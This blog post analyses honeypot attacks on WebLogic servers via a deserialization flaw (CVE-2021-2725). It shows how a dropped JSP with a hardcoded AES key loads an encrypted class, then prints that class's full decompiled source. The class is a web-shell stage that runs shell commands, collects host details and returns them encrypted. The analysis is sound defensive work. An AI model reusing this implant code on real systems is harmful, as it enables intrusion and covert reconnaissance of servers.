Since few days now there has been a constant hammering of the weblogic honeypots with the exploits targeting a deserialization vulnerability leading to remote code execution vulnerability identified by CVE-2021-2725.
The initial request to exploit the vulnerability looks like below,
The payload is a base64 string that gets decoded and saved to "servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/4dde4d88.jsp". Below is the decoded version of the base64 blob.
Reading the ".jsp" file it is clear that this blob in the 2nd request is base64 encoded and encrypted using AES. The key for decryption is hardcoded in the jsp file. They key can be identified as "fc5e038d38a57032". Using the key the blob in the 2nd request can be decrypted. It turns out the 2nd blob is a class file. The key is also saved in the session using "session.putvalue" into the variable "u". Below is the decrypted version using cyberchef.
Decompiling the class to source we can get an understanding of what's happening in the background. The class gets information about filepath, os, architecture, path, drivelist (line 70-80) encrypts using the same key (line 93 or 109 or 125) and posts it as a response.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Decompiler 223ms, total 1332ms, lines 226 */ | |
| package BasicInfo; | |
| import java.io.BufferedReader; | |
| import java.io.File; | |
| import java.io.InputStreamReader; | |
| import java.lang.reflect.Method; | |
| import java.nio.charset.Charset; | |
| import java.util.HashMap; | |
| import java.util.Iterator; | |
| import java.util.Map; | |
| import java.util.Properties; | |
| import java.util.Set; | |
| import java.util.Map.Entry; | |
| import javax.crypto.Cipher; | |
| import javax.crypto.spec.SecretKeySpec; | |
| public class BasicInfo { | |
| private static String status; | |
| private Object Request; | |
| private Object Response; | |
| private Object Session; | |
| public boolean equals(Object obj) { | |
| String result = ""; | |
| String var3 = ""; | |
| boolean var25 = false; | |
| Object so; | |
| Method write; | |
| String start; | |
| String currentPath; | |
| label142: { | |
| try { | |
| var25 = true; | |
| this.fillContext(obj); | |
| StringBuilder basicInfo = new StringBuilder(""); | |
| Properties props = System.getProperties(); | |
| Set<Entry<Object, Object>> entrySet = props.entrySet(); | |
| Iterator var7 = entrySet.iterator(); | |
| while(var7.hasNext()) { | |
| Entry<Object, Object> entry = (Entry)var7.next(); | |
| if (entry.getKey().toString().indexOf("class.path") > 0 && entry.getKey().toString().indexOf("boot.class.path") < 0) { | |
| basicInfo.append(entry.getKey() + " = " + entry.getValue() + "\r\n"); | |
| } | |
| if (entry.getKey().toString().indexOf("runtime.version") > 0) { | |
| basicInfo.append(entry.getKey() + " = " + entry.getValue() + "\r\n"); | |
| } | |
| } | |
| currentPath = (new File("")).getAbsolutePath(); | |
| String driveList = ""; | |
| File[] listRoots = File.listRoots(); | |
| File[] var11 = listRoots; | |
| int var12 = listRoots.length; | |
| for(int var13 = 0; var13 < var12; ++var13) { | |
| File f = var11[var13]; | |
| driveList = driveList + f.getPath() + ";"; | |
| } | |
| String osinfo = ""; | |
| if (System.getProperty("os.name").toLowerCase().indexOf("windows") >= 0) { | |
| osinfo = "WINNT"; | |
| } else { | |
| osinfo = "Linux"; | |
| } | |
| String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch"); | |
| Map<String, String> entity = new HashMap(); | |
| entity.put("container", basicInfo.toString()); | |
| entity.put("filepath", currentPath); | |
| entity.put("os", osinfo); | |
| entity.put("drivelist", driveList); | |
| entity.put("system", osInfo); | |
| entity.put("user", this.RunCMD("whoami")); | |
| entity.put("arch", System.getProperty("os.arch")); | |
| result = this.buildJson(entity, true); | |
| var25 = false; | |
| break label142; | |
| } catch (Exception var29) { | |
| var25 = false; | |
| } finally { | |
| if (var25) { | |
| try { | |
| Object so = this.Response.getClass().getMethod("getOutputStream", (Class[])(new Class[0])).invoke(this.Response); | |
| Method write = so.getClass().getMethod("write", byte[].class); | |
| String start = "dc5d4dd8c5da7fe302a8063117e3845b"; | |
| String end = "ec029520d4aad3666b72d87e6fcd1d1e"; | |
| write.invoke(so, "dc5d4dd8c5da7fe302a8063117e3845b".getBytes("UTF-8")); | |
| write.invoke(so, this.Encrypt(result.getBytes("UTF-8"))); | |
| write.invoke(so, "ec029520d4aad3666b72d87e6fcd1d1e".getBytes("UTF-8")); | |
| so.getClass().getMethod("flush", (Class[])(new Class[0])).invoke(so); | |
| so.getClass().getMethod("close", (Class[])(new Class[0])).invoke(so); | |
| } catch (Exception var26) { | |
| } | |
| } | |
| } | |
| try { | |
| so = this.Response.getClass().getMethod("getOutputStream", (Class[])(new Class[0])).invoke(this.Response); | |
| write = so.getClass().getMethod("write", byte[].class); | |
| start = "dc5d4dd8c5da7fe302a8063117e3845b"; | |
| currentPath = "ec029520d4aad3666b72d87e6fcd1d1e"; | |
| write.invoke(so, "dc5d4dd8c5da7fe302a8063117e3845b".getBytes("UTF-8")); | |
| write.invoke(so, this.Encrypt(result.getBytes("UTF-8"))); | |
| write.invoke(so, "ec029520d4aad3666b72d87e6fcd1d1e".getBytes("UTF-8")); | |
| so.getClass().getMethod("flush", (Class[])(new Class[0])).invoke(so); | |
| so.getClass().getMethod("close", (Class[])(new Class[0])).invoke(so); | |
| } catch (Exception var27) { | |
| } | |
| return true; | |
| } | |
| try { | |
| so = this.Response.getClass().getMethod("getOutputStream", (Class[])(new Class[0])).invoke(this.Response); | |
| write = so.getClass().getMethod("write", byte[].class); | |
| start = "dc5d4dd8c5da7fe302a8063117e3845b"; | |
| currentPath = "ec029520d4aad3666b72d87e6fcd1d1e"; | |
| write.invoke(so, "dc5d4dd8c5da7fe302a8063117e3845b".getBytes("UTF-8")); | |
| write.invoke(so, this.Encrypt(result.getBytes("UTF-8"))); | |
| write.invoke(so, "ec029520d4aad3666b72d87e6fcd1d1e".getBytes("UTF-8")); | |
| so.getClass().getMethod("flush", (Class[])(new Class[0])).invoke(so); | |
| so.getClass().getMethod("close", (Class[])(new Class[0])).invoke(so); | |
| } catch (Exception var28) { | |
| } | |
| return true; | |
| } | |
| private String RunCMD(String cmd) throws Exception { | |
| Charset osCharset = Charset.forName(System.getProperty("sun.jnu.encoding")); | |
| String result = ""; | |
| if (cmd != null && cmd.length() > 0) { | |
| Process p; | |
| if (System.getProperty("os.name").toLowerCase().indexOf("windows") >= 0) { | |
| p = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", cmd}); | |
| } else { | |
| p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd}); | |
| } | |
| BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream(), "GB2312")); | |
| String disr; | |
| for(disr = br.readLine(); disr != null; disr = br.readLine()) { | |
| result = result + disr + "\n"; | |
| } | |
| br = new BufferedReader(new InputStreamReader(p.getErrorStream(), "GB2312")); | |
| for(disr = br.readLine(); disr != null; disr = br.readLine()) { | |
| status = "error"; | |
| result = result + disr + "\n"; | |
| } | |
| result = new String(result.getBytes(osCharset)); | |
| } | |
| return result; | |
| } | |
| private byte[] Encrypt(byte[] bs) throws Exception { | |
| String key = this.Session.getClass().getMethod("getAttribute", String.class).invoke(this.Session, "u").toString(); | |
| byte[] raw = key.getBytes("utf-8"); | |
| SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES"); | |
| Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding"); | |
| cipher.init(1, skeySpec); | |
| byte[] encrypted = cipher.doFinal(bs); | |
| return encrypted; | |
| } | |
| private String buildJson(Map<String, String> entity, boolean encode) throws Exception { | |
| StringBuilder sb = new StringBuilder(); | |
| String version = System.getProperty("java.version"); | |
| sb.append("{"); | |
| Iterator var5 = entity.keySet().iterator(); | |
| while(var5.hasNext()) { | |
| String key = (String)var5.next(); | |
| sb.append("\"" + key + "\":\""); | |
| String value = ((String)entity.get(key)).toString(); | |
| if (encode) { | |
| Class Base64; | |
| Object Encoder; | |
| if (version.compareTo("1.9") >= 0) { | |
| this.getClass(); | |
| Base64 = Class.forName("java.util.Base64"); | |
| Encoder = Base64.getMethod("getEncoder", (Class[])null).invoke(Base64, (Object[])null); | |
| value = (String)Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, value.getBytes("UTF-8")); | |
| } else { | |
| this.getClass(); | |
| Base64 = Class.forName("sun.misc.BASE64Encoder"); | |
| Encoder = Base64.newInstance(); | |
| value = (String)Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, value.getBytes("UTF-8")); | |
| value = value.replace("\n", "").replace("\r", ""); | |
| } | |
| } | |
| sb.append(value); | |
| sb.append("\","); | |
| } | |
| sb.setLength(sb.length() - 1); | |
| sb.append("}"); | |
| return sb.toString(); | |
| } | |
| private void fillContext(Object obj) throws Exception { | |
| if (obj.getClass().getName().indexOf("PageContext") >= 0) { | |
| this.Request = obj.getClass().getMethod("getRequest", (Class[])(new Class[0])).invoke(obj); | |
| this.Response = obj.getClass().getMethod("getResponse", (Class[])(new Class[0])).invoke(obj); | |
| this.Session = obj.getClass().getMethod("getSession", (Class[])(new Class[0])).invoke(obj); | |
| } else { | |
| Map<String, Object> objMap = (Map)obj; | |
| this.Session = objMap.get("session"); | |
| this.Response = objMap.get("response"); | |
| this.Request = objMap.get("request"); | |
| } | |
| this.Response.getClass().getMethod("setCharacterEncoding", String.class).invoke(this.Response, "UTF-8"); | |
| } | |
| } |
No comments:
Post a Comment